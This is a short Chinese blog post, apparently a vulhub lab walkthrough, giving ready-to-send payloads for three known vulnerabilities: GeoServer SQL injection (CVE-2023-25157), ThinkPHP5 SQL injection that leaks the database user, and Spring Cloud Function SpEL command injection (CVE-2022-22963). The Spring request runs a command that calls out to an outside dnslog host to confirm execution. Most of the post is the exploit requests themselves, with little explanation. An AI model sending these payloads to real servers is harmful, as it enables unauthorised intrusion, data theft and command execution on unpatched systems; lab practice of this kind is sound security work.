geoserver SQL注入、Think PHP5 SQL注入、spring命令注入

文章目录

  • [一、geoserver SQL注入CVE-2023-25157](#一、geoserver SQL注入CVE-2023-25157)
  • [二、Think PHP5 SQL注入](#二、Think PHP5 SQL注入)
  • [三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)](#三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963))

一、geoserver SQL注入CVE-2023-25157

介绍GeoServer是一个开源的地理信息系统(GIS)服务器,用于发布、共享和管理地理空间数据和地图服务。它是一个基于Java的应用程序

访问127.0.0.1/geoserver

payload:http://127.0.0.1/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true

二、Think PHP5 SQL注入

think php是php开发框架

payload1:

bash 复制代码
http://127.0.0.1/index.php?ids[]=1&ids[]=2 # payload1,显示出用户名
http://127.0.0.1/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 # payload2,可以在调试页面找到数据库的账户和密码



thinkphp_gui_tools也是可以检测出该SQL注入漏洞的。

三、Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)

spring是一个java框架~

直接访问127.0.0.1:8080是一个错误页面。

直接发送下面的数据包:

php 复制代码
POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping sf4rrw.dnslog.cn")
Content-Type: text/plain
Content-Length: 8

test


相关推荐
饮长安千年月1 小时前
学生管理系统审计
java·网络安全·代码审计
浩浩测试一下3 小时前
网络安全实战指南:从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)
linux·安全·web安全·ubuntu·网络安全·负载均衡·安全架构
vortex511 小时前
网络安全入门综述
安全·web安全·网络安全
CyberSecurity_zhang1 天前
汽车网络安全 -- 理解暴露面、攻击面和攻击向量
网络安全·信息安全·汽车
Suckerbin1 天前
pikachu靶场-敏感信息泄露
网络·学习·安全·网络安全
自由鬼2 天前
高性能的开源网络入侵检测和防御引擎:Suricata介绍
网络·安全·网络安全·开源·系统安全·入侵检测
ALe要立志成为web糕手2 天前
第十六周蓝桥杯2025网络安全赛道
安全·web安全·网络安全·蓝桥杯
CHTXRT2 天前
2025第十六届蓝桥杯大赛(软件赛)网络安全赛 Writeup
c语言·网络·web安全·网络安全·蓝桥杯·wireshark
Thanks_ks2 天前
深入理解网络安全中的加密技术
网络安全·非对称加密·对称加密·密钥管理·加密技术·https 安全·量子计算安全
迷路的小绅士3 天前
防火墙技术深度解析:从包过滤到云原生防火墙的部署与实战
网络安全·云原生·防火墙技术·包过滤防火墙·状态检测防火墙